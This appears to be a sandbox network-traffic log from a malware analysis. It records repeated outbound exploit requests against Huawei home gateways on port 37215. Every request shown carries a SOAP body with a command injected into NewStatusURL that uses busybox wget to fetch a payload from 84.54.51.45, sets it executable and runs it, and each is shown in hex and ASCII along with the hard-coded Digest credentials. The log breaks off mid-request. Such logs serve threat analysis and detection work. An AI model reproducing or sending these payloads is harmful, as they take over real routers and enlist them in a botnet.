2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2247192.168.2.156068441.231.253.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672868967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2248192.168.2.154639841.236.54.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672888041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2249192.168.2.153856641.151.201.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672909021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2250192.168.2.155937041.84.145.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672914028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2251192.168.2.154656241.114.190.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672940969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2252192.168.2.154530041.96.158.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672946930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2253192.168.2.155584441.2.27.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.672955036 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2254192.168.2.154725041.9.54.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673003912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2255192.168.2.155748841.111.71.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673003912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2256192.168.2.155249241.249.236.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673007011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2257192.168.2.155611241.96.103.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673036098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
